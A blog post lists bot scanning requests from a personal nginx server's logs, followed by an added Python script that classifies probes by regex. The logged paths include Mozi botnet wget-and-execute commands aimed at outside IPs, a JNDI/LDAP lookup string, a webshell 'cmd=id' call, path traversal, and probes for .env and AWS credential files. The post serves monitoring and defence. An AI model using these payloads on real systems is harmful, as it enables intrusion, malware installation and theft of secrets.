Weird HTTP requests in logs

Taking a look at my server logs, finding WordPress, PHP, AWS exploits.

I checked my nginx server logs and decided it would be nice to show some examples of some weird bot requests.

No 500 responses by luck :D

Here are nearly 600 GET requests:
/../../../mnt/mtd/Config/Account1
/.DS_Store
/.aws/credentials
/.docker/.env
/.docker/laravel/app/.env
/.env
/.env.backup
/.env.bak
/.env.local
/.env.prod
/.env.prod.local
/.env.production
/.env.production.local
/.env.save
/.git/HEAD
/.git/config
/.git/info/refs?service=git-upload-pack
/.json
/.msmtprc
///ext-js/app/common/zyFunction.js
///remote/fgt_lang?lang=/../../../..//////////dev/
//a2billing/customer/templates/default/footer.tpl
//pv/000000000000.cfg
//pv/spa112.cfg
/188.166.60.136/.env
/1phpmyadmin/index.php?lang=en
/2018/wp-includes/wlwmanifest.xml
/2019/wp-includes/wlwmanifest.xml
/2020/wp-includes/wlwmanifest.xml
/2021/wp-includes/wlwmanifest.xml
/2index.php
/2phpmyadmin/index.php?lang=en
/:443:undefined?id=
/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
/AjCwLauz69kIB1cMYFdynqXQ7vd
/C2yn
/CSS/Miniweb.css
/DaIfAQ94igNxmKVSYwWnvrjhB6K
/HNAP1
/HNAP1/
/JzsNRtGE7yenY1Qu6fmAvWbOCBe
/MyAdmin/index.php?lang=en
/MyAdmin/scripts/setup.php
/MySQL/scripts/setup.php
/PMA/index.php?lang=en
/Portal/Portal.mwsl
/Portal0000.htm
/QWDp
/ReportServer
/SAAS/auth/login
/SQLite/main.php
/SQLiteManager-1.2.4/main.php
/SQLiteManager/main.php
/SQlite/main.php
/Telerik.Web.UI.WebResource.axd?type=rau
/W17pJ6eUtzfqiFGNja3LmKuwxQ3
/__Additional
/_ignition/execute-solution
/_phpMyAdmin/index.php?lang=en
/_phpmyadmin/index.php?lang=en
/_phpmyadmin/scripts/setup.php
/_phpmyadmin_/index.php?lang=en
/_profiler/phpinfo
/_profiler/phpinfo
/ab2g
/ab2h
/acme-challenge/.env
/acme_challenges/.env
/actuator/gateway/routes
/actuator/health
/admin
/admin-app/.env
/admin.asp
/admin.aspx
/admin.cfm
/admin.cgi
/admin.html
/admin.jhtml
/admin.jsa
/admin.jsp
/admin.php
/admin.pl
/admin.shtml
/admin/
/admin/.env
/admin/db/index.php?lang=en
/admin/index.php?lang=en
/admin/login
/admin/login.php
/admin/phpMyAdmin/index.php?lang=en
/admin/phpmyadmin/index.php?lang=en
/admin/phpmyadmin/scripts/setup.php
/admin/pma/index.php?lang=en
/admin/pma/scripts/setup.php
/admin/scripts/setup.php
/admin/sqladmin/index.php?lang=en
/admin/sysadmin/index.php?lang=en
/admin/web/index.php?lang=en
/administrator/PMA/index.php?lang=en
/administrator/admin/index.php?lang=en
/administrator/components/com_joommyadmin/phpmyadmin/scripts/setup.php
/administrator/db/index.php?lang=en
/administrator/phpMyAdmin/index.php?lang=en
/administrator/phpmyadmin/index.php?lang=en
/administrator/pma/index.php?lang=en
/administrator/web/index.php?lang=en
/ads.txt
/agSearch/SQlite/main.php
/apache-default/phpmyadmin/scripts/setup.php
/api/.env
/api/geojson?url=file:///etc/hosts
/api/search?folderIds=0
/apiv4?{jndi:ldap://45.92.54.232/github/graphql},
/app/.env
/app/config/.env
/application/.env
/apps/.env
/audio/.env
/auth/login
/autodiscover/[email protected]/owa/?&Email=autodiscover/autodiscover.json%[email protected]
/aws.yml
/backend/.env
/base.asp
/base.aspx
/base.cfm
/base.cgi
/base.html
/base.inc
/base.jhtml
/base.jsa
/base.jsp
/base.php
/base.pl
/base.shtml
/base/.env
/beta/.env
/blog/.env
/blog/phpmyadmin/scripts/setup.php
/blog/wp-includes/wlwmanifest.xml
/blog/wp-login.php
/boaform/admin/formLogin?username=admin&psd=admin
/boaform/admin/formLogin?username=ec8&psd=ec8
/boaform/admin/formLogin?username=user&psd=user
/bootstrap/.env
/c/version.js
/c/version.js
/cdn-cgi/trace
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/cgi-bin/.env
/cmd.cgi
/cms/.env
/cms/wp-includes/wlwmanifest.xml
/conf/.env
/config.js
/config.json
/config/.env
/config/aws.yml
/config/getuser?index=0
/config/getuser?index=0
/configuracion/phpmyadmin/scripts/setup.php
/console/
/cookieconv.php
/core/.env
/core/app/.env
/cp/.env
/cpanelphpmyadmin/scripts/setup.php
/cpphpmyadmin/scripts/setup.php
/crm/.env
/dashboard/phpinfo.php
/database/.env
/database/index.php?lang=en
/db/db-admin/index.php?lang=en
/db/dbadmin/index.php?lang=en
/db/dbweb/index.php?lang=en
/db/index.php?lang=en
/db/myadmin/index.php?lang=en
/db/phpMyAdmin-3/index.php?lang=en
/db/phpMyAdmin-4/index.php?lang=en
/db/phpMyAdmin-5/index.php?lang=en
/db/phpMyAdmin/index.php?lang=en
/db/phpMyAdmin3/index.php?lang=en
/db/phpmyadmin/index.php?lang=en
/db/phpmyadmin3/index.php?lang=en
/db/phpmyadmin4/index.php?lang=en
/db/phpmyadmin5/index.php?lang=en
/db/scripts/setup.php
/db/webadmin/index.php?lang=en
/db/webdb/index.php?lang=en
/db/websql/index.php?lang=en
/dbadmin/index.php?lang=en
/dbadmin/scripts/setup.php
/debug/default/view
/debug/default/view.html
/debug/default/view?panel=config
/defau1t.php
/defaul1.php
/default.asp
/default.aspx
/default.cfm
/default.cgi
/default.html
/default.jhtml
/default.jsa
/default.jsp
/default.php
/default.pl
/default.shtml
/development/.env
/doc/.env
/docker/.env
/docker/app/.env
/docs/cplugError.html/
/dotfiles/.env
/dqgqoeCXckuwPtxov
/dqgqoeCXckuwPtxov
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
/en/.env
/env.bak
/environments/environment.ts
/evox/about
/evox/about
/files/index.php?file=tf2rghf.jpg
/fjS9
/flu/403.html
/flu/403.html
/forum/phpmyadmin/scripts/setup.php
/frontend/web/debug/default/view
/frontend_dev.php/$
/ghksjdghdfksanitycheckqwerjlhfgjksdghlid
/home.asp
/home.aspx
/home.cfm
/home.cgi
/home.html
/home.jhtml
/home.jsa
/home.jsp
/home.php
/home.pl
/home.shtml
/hudson
/hudson/script
/humans.txt
/idx_config/
/img/background.jpeg
/img/disappointed.jpeg
/index.asp
/index.aspx
/index.cfm
/index.cgi
/index.jhtml
/index.jsa
/index.jsp
/index.php
/index.pl
/index.shtml
/index.term
/indice.asp
/indice.aspx
/indice.cfm
/indice.cgi
/indice.html
/indice.jhtml
/indice.jsa
/indice.jsp
/indice.php
/indice.pl
/indice.shtml
/info.php
/infos.php
/inicio.asp
/inicio.aspx
/inicio.cfm
/inicio.cgi
/inicio.html
/inicio.jhtml
/inicio.jsa
/inicio.jsp
/inicio.php
/inicio.pl
/inicio.shtml
/installer.php
/invoker/readonly
/isadmin.htm
/jenkins/login
/js/.env
/kyc/.env
/laravel/.env
/laravel/core/.env
/leaf.php
/leafmailer.php
/leafmailer2.8(1).php
/leafmailer2.8.php
/lib/.env
/library/.env
/libs/.env
/linusadmin-phpinfo.php
/local/.env
/localstart.asp
/localstart.aspx
/localstart.cfm
/localstart.cgi
/localstart.html
/localstart.jhtml
/localstart.jsa
/localstart.jsp
/localstart.php
/localstart.pl
/localstart.shtml
/login
/login.action
/login.aspx
/login.php
/mF2w
/mail.php
/main.asp
/main.aspx
/main.cfm
/main.cgi
/main.html
/main.jhtml
/main.jsa
/main.jsp
/main.php
/main.pl
/main.shtml
/manager/html
/manager/text/list
/manager/text/list
/media/wp-includes/wlwmanifest.xml
/meetup.xml
/menu.asp
/menu.aspx
/menu.cfm
/menu.cgi
/menu.html
/menu.jhtml
/menu.jsa
/menu.jsp
/menu.php
/menu.pl
/menu.shtml
/myadmin/index.php?lang=en
/myadmin/scripts/setup.php
/mysql-admin/index.php?lang=en
/mysql/admin/index.php?lang=en
/mysql/db/index.php?lang=en
/mysql/dbadmin/index.php?lang=en
/mysql/index.php?lang=en
/mysql/mysqlmanager/index.php?lang=en
/mysql/pMA/index.php?lang=en
/mysql/pma/index.php?lang=en
/mysql/scripts/setup.php
/mysql/sqlmanager/index.php?lang=en
/mysql/web/index.php?lang=en
/mysqladmin/index.php?lang=en
/mysqladmin/scripts/setup.php
/mysqlmanager/index.php?lang=en
/new/.env
/news/wp-includes/wlwmanifest.xml
/newsite/.env
/nmaplowercheck1655213484
/nmaplowercheck1655995522
/nperrin.io/.env
/old/.env
/old_phpinfo.php
/opini%C3%B3n/opinar-ideas-que-importan.html
/owa/auth/logon.aspx
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
/owa/auth/x.js
/panel
/personal.xml
/php-info.php
/php-my-admin/index.php?lang=en
/php-my-admin/scripts/setup.php
/php-myadmin/index.php?lang=en
/php/phpmyadmin/scripts/setup.php
/php/scripts/setup.php
/phpMyAdmin-2/scripts/setup.php
/phpMyAdmin-3/index.php?lang=en
/phpMyAdmin-4.9.7/index.php?lang=en
/phpMyAdmin-4/index.php?lang=en
/phpMyAdmin-5.1.0/index.php?lang=en
/phpMyAdmin-5.1.1/index.php?lang=en
/phpMyAdmin-5.1.2/index.php?lang=en
/phpMyAdmin-5.1.3/index.php?lang=en
/phpMyAdmin-5.2.0/index.php?lang=en
/phpMyAdmin-5/index.php?lang=en
/phpMyAdmin/index.php?lang=en
/phpMyAdmin/scripts/setup.php
/phpMyAdmin1/index.php?lang=en
/phpMyAdmin2/index.php?lang=en
/phpMyAdmin3/index.php?lang=en
/phpMyAdmin4/index.php?lang=en
/phpMyAdmin5.1/index.php?lang=en
/phpMyAdmin5.2/index.php?lang=en
/phpMyAdmin5/index.php?lang=en
/phpMyAdmin_/index.php?lang=en
/phpMyadmin/index.php?lang=en
/phpadmin/scripts/setup.php
/phpinfo
/phpinfo.php
/phpmy-admin/index.php?lang=en
/phpmy/index.php?lang=en
/phpmy/scripts/setup.php
/phpmyAdmin/index.php?lang=en
/phpmyadmin/
/phpmyadmin/index.php
/phpmyadmin/index.php?lang=en
/phpmyadmin/scripts/setup.php
/phpmyadmin1/index.php?lang=en
/phpmyadmin2/index.php?lang=en
/phpmyadmin2011/index.php?lang=en
/phpmyadmin2012/index.php?lang=en
/phpmyadmin2013/index.php?lang=en
/phpmyadmin2014/index.php?lang=en
/phpmyadmin2015/index.php?lang=en
/phpmyadmin2016/index.php?lang=en
/phpmyadmin2017/index.php?lang=en
/phpmyadmin2018/index.php?lang=en
/phpmyadmin2019/index.php?lang=en
/phpmyadmin2020/index.php?lang=en
/phpmyadmin2021/index.php?lang=en
/phpmyadmin2022/index.php?lang=en
/phpmyadmin3/index.php?lang=en
/phpmyadmin4.8.5/index.php
/phpmyadmin4/index.php?lang=en
/phpmyadmin5/index.php?lang=en
/phpmyadmin_/index.php?lang=en
/phpmyadmin_/scripts/setup.php
/phppma/index.php?lang=en
/pma/index.php?lang=en
/pma/scripts/setup.php
/pmd/index.php
/pools
/pools/default/buckets
/portal/redlion
/preview.php?/albums/&preview=elementary/a:<?=print(43543534534-567567567);?>
/private/.env
/prod/.env
/program/index.php?lang=en
/protected/.env
/pub/.env
/public/.env
/pv/000000000000.cfg
/pv/spa112.cfg
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/remote/login
/robots.txt
/s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s3cmd.ini
/sapi/debug/default/view
/script
/script
/script/.env
/scripts/setup.php
/send.php
/sender.php
/server-status
/servlet?m=mod_listener&p=login&q=loginForm&jumpto=status
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.46.184.109:41501/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
/shared/.env
/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
/shop/wp-includes/wlwmanifest.xml
/shopdb/index.php?lang=en
/site/.env
/site/wp-includes/wlwmanifest.xml
/sites/.env
/sites/all/libraries/mailchimp/.env
/sites/all/libraries/plupload/examples/upload.php
/sito/wp-includes/wlwmanifest.xml
/solr/admin/info/system?wt=json
/sql/myadmin/index.php?lang=en
/sql/php-myadmin/index.php?lang=en
/sql/phpMyAdmin/index.php?lang=en
/sql/phpMyAdmin2/index.php?lang=en
/sql/phpmanager/index.php?lang=en
/sql/phpmy-admin/index.php?lang=en
/sql/phpmyadmin3/index.php?lang=en
/sql/phpmyadmin4/index.php?lang=en
/sql/phpmyadmin5/index.php?lang=en
/sql/sql-admin/index.php?lang=en
/sql/sql/index.php?lang=en
/sql/sqladmin/index.php?lang=en
/sql/sqlweb/index.php?lang=en
/sql/webadmin/index.php?lang=en
/sql/webdb/index.php?lang=en
/sql/websql/index.php?lang=en
/sqlite/main.php
/sqlitemanager/main.php
/sqlmanager/index.php?lang=en
/src/.env
/src/environments/environment.ts
/stalker_portal/c/version.js
/stalker_portal/c/version.js
/stalker_portal/server/tools/auth_simple.php
/start.asp
/start.aspx
/start.cfm
/start.cgi
/start.html
/start.jhtml
/start.jsa
/start.jsp
/start.php
/start.pl
/start.shtml
/storage/.env
/stream/live.php
/stream/live.php
/streaming/clients_live.php
/streaming/clients_live.php
/style.php?sig=rename
/system_api.php
/system_api.php
/tech.xml
/telescope/requests
/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php
/test/wp-includes/wlwmanifest.xml
/tokenlite_app/.env
/tomcatwar.jsp
/tomcatwar.jsp?pwd=j&cmd=id
/tool/view/phpinfo.view.php
/typo3/phpmyadmin/scripts/setup.php
/ui/vropspluginui/rest/services/getstatus
/update/v32/default
/users/sign_in
/v2/_catalog
/vendor/.env
/vendor/laravel/.env
/vendor/phpunit/phpunit/phpunit.xml
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/version
/w00tw00t.at.blackhats.romanian.anti-sec:)
/web/debug/default/view
/web/phpMyAdmin/scripts/setup.php
/web/scripts/setup.php
/web/wp-includes/wlwmanifest.xml
/weblogin.htm
/website/wp-includes/wlwmanifest.xml
/websql/scripts/setup.php
/wikindex.php
/wordpress/wp-includes/wlwmanifest.xml
/wordpress/wp-login.php
/wp-admin/.env
/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=update_plugin
/wp-admin/leafmailer2.8.php
/wp-config.php-backup
/wp-content/.env
/wp-content/leafmailer2.8.php
/wp-content/plugins/cherry-plugin/admin/css/tinymce-shortcodes.css
/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=upload.php
/wp-content/plugins/jquery-html5-file-upload/readme.txt
/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en
/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
/wp-includes/ID3/license.txt
/wp-includes/leafmailer2.8.php
/wp-includes/wlwmanifest.xml
/wp-login.php
/wp-phpmyadmin/phpmyadmin/scripts/setup.php
/wp/wp-includes/wlwmanifest.xml
/wp/wp-login.php
/wp1/wp-includes/wlwmanifest.xml
/wp2/wp-includes/wlwmanifest.xml
/www/.env
/xampp/phpmyadmin/scripts/setup.php
/xmlrpc.php?rsd
/~phpmyadmin/scripts/setup.php
/default.asp

Some requests might be part of some protocol I don't know, and maybe I missed something filtering the requests, but I think the majority are exploits for PHP, WordPress and badly configured proxy servers.

Then some POST requests:
/
/.env.prod
/.env.production
/.env.save
/51028231
/Autodiscover/Autodiscover.xml
/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7
/GponForm/diag_Form?images/
/HNAP1/
/_ignition/execute-solution
/admin-app/.env
/ajax
/boaform/admin/formLogin
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
/cgi-bin/index2.asp
/cms/.env
/core/.env
/core/.env
/development/.env
/editBlackAndWhiteList
/index.htm
/index.html/sfNqUd38H96GleCQVQ2c82GHeK21ZaE.srv
/local/.env
/mgmt/tm/util/bash
/mifs/.;/services/LogService
/private/.env
/script/.env
/scripts/WPnBr.dll
/sdk
/shared/.env
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

This is just a static website… Maybe this goes to show that good monitoring is also for hobbyist projects.
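
As an added example (not part of the original post), here is a small Python script for this kind of monitoring on nginx combined-format access logs: it groups probe requests into rough categories and flags any probe that was answered with something other than a 3xx or 4xx. The rule names, regexes and sample log lines are assumptions constructed for illustration; the paths are taken or shortened from the lists above.

```python
import re
from collections import Counter
from urllib.parse import unquote

# nginx "combined" format: ip - user [time] "METHOD target PROTO" status bytes ...
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Rough categories based on the paths listed above; the first matching rule wins.
RULES = [
    ("command-exec",   re.compile(r"/bin/sh|[?&;]cmd=|wget\+", re.I)),
    ("jndi-lookup",    re.compile(r"\{jndi:", re.I)),
    ("path-traversal", re.compile(r"\.\./")),
    ("secret-file",    re.compile(r"\.env\b|\.aws/|\.git/|aws\.yml|s3cmd\.ini|wp-config", re.I)),
    ("db-admin",       re.compile(r"myadmin|/pma/|sqlite|scripts/setup\.php", re.I)),
    ("wordpress",      re.compile(r"/wp-|xmlrpc\.php", re.I)),
    ("php-probe",      re.compile(r"phpinfo|eval-stdin\.php", re.I)),
]

def classify(target):
    """Return the category of a request target, or None if no rule matches."""
    decoded = unquote(target)  # turns %2e%2e into .. before matching
    for name, pattern in RULES:
        if pattern.search(decoded):
            return name
    return None

def summarize(lines):
    """Count probes per category and collect probes that did not get a 3xx/4xx."""
    counts, review = Counter(), []
    for line in lines:
        m = LINE_RE.match(line)
        category = classify(m["target"]) if m else None
        if category is None:
            continue  # unparsable line or ordinary request
        counts[category] += 1
        if m["status"][0] not in "34":  # a 2xx or 5xx on a probe deserves a look
            review.append((m["ip"], m["method"], m["target"], m["status"]))
    return counts, review

# Constructed sample lines (documentation IP ranges, made-up timestamps and statuses).
SAMPLE = [
    '203.0.113.7 - - [14/Jun/2022:13:31:24 +0000] "GET /.env HTTP/1.1" 404 153 "-" "-"',
    '203.0.113.7 - - [14/Jun/2022:13:31:25 +0000] "GET /.git/config HTTP/1.1" 200 92 "-" "-"',
    '198.51.100.23 - - [14/Jun/2022:13:40:02 +0000] "GET /phpmyadmin/index.php?lang=en HTTP/1.1" 404 153 "-" "-"',
    '198.51.100.23 - - [14/Jun/2022:13:40:03 +0000] "GET /wp-login.php HTTP/1.1" 404 153 "-" "-"',
    '192.0.2.50 - - [14/Jun/2022:14:02:11 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 157 "-" "-"',
    '192.0.2.50 - - [14/Jun/2022:14:02:12 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 400 157 "-" "-"',
    '192.0.2.9 - - [14/Jun/2022:14:10:00 +0000] "GET /img/background.jpeg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
]
```

Calling `summarize(open("/var/log/nginx/access.log"))` (the path is an assumption about a default install) returns the per-category counts and the list of probes that need a closer look.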